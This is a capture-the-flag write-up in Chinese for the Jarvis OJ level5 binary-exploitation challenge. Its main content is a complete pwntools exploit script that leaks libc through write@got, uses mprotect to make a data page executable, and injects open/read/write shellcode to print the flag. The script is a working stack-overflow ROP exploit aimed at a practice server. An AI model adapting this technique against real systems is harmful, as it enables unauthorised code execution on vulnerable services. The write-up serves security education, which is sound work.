[XMAN]level5
mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。
nc pwn2.jarvisoj.com 9884
附件同level3_x64
mmap可以将文件或其他对象映射到内存中,mprotect可以改变某段地址的权限(rwx)
程序开启了NX保护(栈和数据段不可执行),因此可以考虑用mprotect将bss段或data段所在的一整页改成rwx权限:mprotect的起始地址必须按页对齐(本题用的是0x600000,长度0x1000,权限7即PROT_READ|PROT_WRITE|PROT_EXEC),然后用read把shellcode写进这一页并跳转执行。由于system和execve不可用,shellcode只使用open/read/write三个系统调用把flag读出来。
exp如下:
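from pwn import *

# Jarvis OJ [XMAN] level5 -- same binary as level3_x64, but system()/execve()
# are assumed to be unusable.  Plan:
#   1. leak write@got to locate libc,
#   2. mprotect() one page of the binary's data segment to rwx,
#   3. read() open/read/write-only shellcode into that page and return into it.

# io = process('./level3_x64')          # local testing
io = remote('pwn2.jarvisoj.com', 9884)
elf = ELF('./level3_x64')
# libc = elf.libc                        # local testing
libc = ELF('./libc-2.19.so')             # remote libc; every libc offset below is for this build
context.arch = 'amd64'                   # must be set before shellcraft/asm are used
context.os = 'linux'
# context.log_level = 'debug'

# Addresses in the (non-PIE) binary.
pop_rdi = 0x4006b3        # pop rdi ; ret            (tail of __libc_csu_init)
pop_rsi_r15 = 0x4006b1    # pop rsi ; pop r15 ; ret  (tail of __libc_csu_init)
write_plt = 0x4004B0
write_got = 0x600A58
read_plt = 0x4004C0
vuln_addr = 0x4005E6      # re-enter the vulnerable function for the next overflow

PADDING = b'a' * 136      # buffer + saved rbp, up to the saved return address

# Page of the data segment that will be made executable.  mprotect() needs a
# page-aligned address; 0x600000 is the page holding the ELF's .got/.dynamic.
RWX_PAGE = 0x600000
PAGE_SIZE = 0x1000
PROT_RWX = 7                      # PROT_READ | PROT_WRITE | PROT_EXEC
FLAG_BUF = RWX_PAGE + 0x500       # scratch area in the same page for the flag bytes

# --- stage 1: write(1, write_got, <leftover rdx>) to leak libc ---
# rdx is not controlled here: it still holds the count argument of the read()
# that overflowed us, which is large enough to emit the 8-byte pointer.
payload = PADDING + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got)
payload += p64(0) + p64(write_plt) + p64(vuln_addr)
io.recvuntil(b'Input:\n')
io.send(payload)
# recvn(): u64() needs exactly 8 bytes, while recv(8) may return fewer.
write_addr = u64(io.recvn(8))
info(f"write_addr: {write_addr:#x}")

libc_base = write_addr - libc.symbols['write']
info(f"libc_base: {libc_base:#x}")
# The binary has no gadget to load rdx, so these come from libc-2.19.
pop_rsi = libc_base + 0x24885     # pop rsi ; ret
info(f"pop_rsi: {pop_rsi:#x}")
pop_rdx = libc_base + 0x286       # pop rdx ; ret
info(f"pop_rdx: {pop_rdx:#x}")
mprotect_addr = libc_base + libc.symbols['mprotect']
info(f"mprotect_addr: {mprotect_addr:#x}")

# --- stage 2: mprotect(RWX_PAGE, PAGE_SIZE, PROT_RWX), then back to the overflow ---
payload = PADDING + p64(pop_rdi) + p64(RWX_PAGE) + p64(pop_rsi) + p64(PAGE_SIZE)
payload += p64(pop_rdx) + p64(PROT_RWX) + p64(mprotect_addr) + p64(vuln_addr)
io.recvuntil(b'Input:\n')
io.send(payload)

# --- stage 3: read(0, RWX_PAGE, len(shellcode)) and return into the page ---
# The shellcode only uses open/read/write, so a ban on system()/execve() does
# not matter.  The flag fd is taken from rax (open's return value) rather than
# assuming it will be 3.
shellcode = shellcraft.open('./flag')
shellcode += shellcraft.read('rax', FLAG_BUF, 0x100)
shellcode += shellcraft.write(1, FLAG_BUF, 0x100)
shellcode = asm(shellcode)
payload = PADDING + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(RWX_PAGE)
payload += p64(pop_rdx) + p64(len(shellcode)) + p64(read_plt) + p64(RWX_PAGE)
io.recvuntil(b'Input:\n')
io.send(payload)
# Give the ROP chain time to reach its own read(); if both sends land in one
# TCP segment, the vulnerable function's read() swallows the shellcode instead.
sleep(0.5)
io.send(shellcode)
io.interactive()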